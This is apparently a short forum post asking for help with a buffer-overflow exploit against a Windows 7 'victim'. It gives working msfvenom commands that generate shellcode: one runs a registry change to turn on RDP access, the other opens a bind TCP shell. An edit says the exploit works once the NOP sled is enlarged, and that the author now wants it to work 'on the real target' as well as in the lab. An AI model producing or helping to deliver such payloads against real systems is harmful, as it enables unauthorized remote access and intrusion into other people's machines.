I am crafting a BOF and trying to use MSFvenom’s windows/exec payload to do a regedit turning on RDP access
I have tried
msfvenom -p windows/exec CMD='reg add "HKEY_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' -f c -b "\x00\x0a\x0d\x20"
I know the BOF works because it can call calc.exe shellcode. so I have replaced it with the above and it won’t work.
Any suggestions? what am I missing? This is for a Win 7 machine as a victim
I have also tried
msfvenom -p windows/shell/bind_tcp -f c -b "\x00\x0a\x0d\x20" RHOST=X LPORT=X
this also does not work.
Edit: Disregard. Those are the correct syntax for them. I just needed to make my NOP sled bigger
now to find out why it works on my lab but not on the real target.